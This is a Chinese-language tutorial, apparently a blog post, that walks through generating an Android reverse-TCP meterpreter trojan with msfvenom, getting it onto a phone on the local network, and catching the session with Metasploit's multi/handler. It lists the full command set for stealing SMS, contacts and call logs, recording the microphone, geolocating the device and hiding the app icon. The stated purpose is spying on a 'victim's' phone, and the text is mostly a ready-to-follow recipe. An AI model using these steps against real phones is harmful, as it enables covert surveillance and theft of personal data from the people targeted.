本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的Android手机,从而实现对受害者手机数据的读取、音频的窃听、位置的获取、软件安装或卸载等。
环境说明

机器 IP地址
Win10 物理主机 192.168.1.158
Kali 虚拟机 192.168.1.153
测试手机 192.168.1.67

Win10主机和手机应连接同一个WIFI,Kali虚拟机安装在VMware中,使用桥接模式使得可配置其IP地址跟物理主机、手机在同一个网段之中,形成一个小局域网。

攻击准备

木马生成

执行下面的命令生成木马文件

  1. msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.1.153 lport=9999 -o /root/apk.apk

lhost: kali虚拟机地址
lport: 监听端口
image.png

传输木马

将kali虚拟机上生成的apk文件下载下来
下载方式多种多样

传输木马给手机进行安装

开始攻击

MSF监听

依次执行如下命令

  1. msfconsole                //启动msfconsole
  2. use exploit/multi/handler //加载模块
  3. set payload android/meterpreter/reverse_tcp //选择Payload
  4. set lhost 192.168.1.153  //这里的地址设置成我们刚才生成木马的IP地址
  5. set lport 9999           //这里的端口设置成刚才我们生成木马所监听的端口
  6. exploit                  //开始执行漏洞,开始监听,等待手机上线

msfconsole //启动msfconsole

image.png
加载模块

use exploit/multi/handler

image.png

依次设置相关参数

set payload android/meterpreter/reverse_tcp //选择Payload set lhost 192.168.1.153 //这里的地址设置成我们刚才生成木马的IP地址 set lport 9999 //这里的端口设置成刚才我们生成木马所监听的端口

exploit //开始执行漏洞,开始监听,等待手机上线

当用户点击木马文件时会执行木马
image.png
获取攻击命令

help

命令:

  1.  ?                         Help menu
  2.     background                Backgrounds the current session
  3.     bg                        Alias for background
  4.     bgkill                    Kills a background meterpreter script
  5.     bglist                    Lists running background scripts
  6.     bgrun                     Executes a meterpreter script as a background thread
  7.     channel                   Displays information or control active channels
  8.     close                     Closes a channel
  9.     disable_unicode_encoding  Disables encoding of unicode strings
  10.     enable_unicode_encoding   Enables encoding of unicode strings
  11.     exit                      Terminate the meterpreter session
  12.     get_timeouts              Get the current session timeout values
  13.     guid                      Get the session GUID
  14.     help                      Help menu
  15.     info                      Displays information about a Post module
  16.     irb                       Open an interactive Ruby shell on the current session
  17.     load                      Load one or more meterpreter extensions
  18.     machine_id                Get the MSF ID of the machine attached to the session
  19.     pry                       Open the Pry debugger on the current session
  20.     quit                      Terminate the meterpreter session
  21.     read                      Reads data from a channel
  22.     resource                  Run the commands stored in a file
  23.     run                       Executes a meterpreter script or Post module
  24.     secure                    (Re)Negotiate TLV packet encryption on the session
  25.     sessions                  Quickly switch to another session
  26.     set_timeouts              Set the current session timeout values
  27.     sleep                     Force Meterpreter to go quiet, then re-establish session.
  28.     transport                 Change the current transport mechanism
  29.     use                       Deprecated alias for "load"
  30.     uuid                      Get the UUID for the current session
  31.     write                     Writes data to a channel
  34. Stdapi: File system Commands
  35. ============================
  37.     Command       Description
  38.     -------       -----------
  39.     cat           Read the contents of a file to the screen
  40.     cd            Change directory
  41.     checksum      Retrieve the checksum of a file
  42.     cp            Copy source to destination
  43.     dir           List files (alias for ls)
  44.     download      Download a file or directory
  45.     edit          Edit a file
  46.     getlwd        Print local working directory
  47.     getwd         Print working directory
  48.     lcd           Change local working directory
  49.     lls           List local files
  50.     lpwd          Print local working directory
  51.     ls            List files
  52.     mkdir         Make directory
  53.     mv            Move source to destination
  54.     pwd           Print working directory
  55.     rm            Delete the specified file
  56.     rmdir         Remove directory
  57.     search        Search for files
  58.     upload        Upload a file or directory
  61. Stdapi: Networking Commands
  62. ===========================
  64.     Command       Description
  65.     -------       -----------
  66.     ifconfig      Display interfaces
  67.     ipconfig      Display interfaces
  68.     portfwd       Forward a local port to a remote service
  69.     route         View and modify the routing table
  72. Stdapi: System Commands
  73. =======================
  75.     Command       Description
  76.     -------       -----------
  77.     execute       Execute a command
  78.     getuid        Get the user that the server is running as
  79.     localtime     Displays the target system's local date and time
  80.     pgrep         Filter processes by name
  81.     ps            List running processes
  82.     shell         Drop into a system command shell
  83.     sysinfo       Gets information about the remote system, such as OS
  86. Stdapi: User interface Commands
  87. ===============================
  89.     Command       Description
  90.     -------       -----------
  91.     screenshare   Watch the remote user's desktop in real time
  92.     screenshot    Grab a screenshot of the interactive desktop
  95. Stdapi: Webcam Commands
  96. =======================
  98.     Command        Description
  99.     -------        -----------
  100.     record_mic     Record audio from the default microphone for X seconds
  101.     webcam_chat    Start a video chat
  102.     webcam_list    List webcams
  103.     webcam_snap    Take a snapshot from the specified webcam
  104.     webcam_stream  Play a video stream from the specified webcam
  107. Stdapi: Audio Output Commands
  108. =============================
  110.     Command       Description
  111.     -------       -----------
  112.     play          play a waveform audio file (.wav) on the target system
  115. Android Commands
  116. ================
  118.     Command           Description
  119.     -------           -----------
  120.     activity_start    Start an Android activity from a Uri string
  121.     check_root        Check if device is rooted
  122.     dump_calllog      Get call log
  123.     dump_contacts     Get contacts list
  124.     dump_sms          Get sms messages
  125.     geolocate         Get current lat-long using geolocation
  126.     hide_app_icon     Hide the app icon from the launcher
  127.     interval_collect  Manage interval collection capabilities
  128.     send_sms          Sends SMS from target session
  129.     set_audio_mode    Set Ringer Mode
  130.     sqlite_query      Query a SQLite database from storage
  131.     wakelock          Enable/Disable Wakelock
  132.     wlan_geolocate    Get current lat-long using WLAN information
  135. Application Controller Commands
  136. ===============================
  138.     Command        Description
  139.     -------        -----------
  140.     app_install    Request to install apk file
  141.     app_list       List installed apps in the device
  142.     app_run        Start Main Activty for package name
  143.     app_uninstall  Request to uninstall application